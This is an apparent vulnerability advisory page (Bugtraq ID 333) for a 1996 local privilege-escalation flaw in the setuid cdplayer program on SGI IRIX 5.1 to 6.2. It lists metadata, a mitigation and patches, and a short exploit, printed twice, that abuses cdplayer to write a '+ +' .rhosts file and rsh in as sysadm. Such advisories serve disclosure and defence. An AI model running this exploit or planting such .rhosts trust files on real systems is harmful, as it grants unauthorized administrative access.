IRIX cdplayer Vulnerability
BID:333
Info
IRIX cdplayer Vulnerability
| Bugtraq ID: | 333 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Nov 21 1996 12:00AM |
| Updated: | Nov 21 1996 12:00AM |
| Credit: | This vulnerability was discovered and reported to the Bugtraq mailing list by Yuri Volobuev <[email protected]> on November 21, 1996. |
| Vulnerable: |
SGI IRIX 6.2 SGI IRIX 6.1 SGI IRIX 5.3 SGI IRIX 5.2 SGI IRIX 5.1.1 SGI IRIX 5.1 |
| Not Vulnerable: | |
Exploit / POC
IRIX cdplayer Vulnerability
umask 000
cdplayer -dbcdir /usr/admin/
echo "+ +" > /usr/admin/.rhosts
chown root.sys /usr/admin/.rhosts
rsh localhost -l sysadm
umask 000
cdplayer -dbcdir /usr/admin/
echo "+ +" > /usr/admin/.rhosts
chown root.sys /usr/admin/.rhosts
rsh localhost -l sysadm
Solution / Fix
IRIX cdplayer Vulnerability
Solution:
A short term solution is to remove the setuid bit from the application.
Patches are available at http://support.sgi.com
Solution:
A short term solution is to remove the setuid bit from the application.
Patches are available at http://support.sgi.com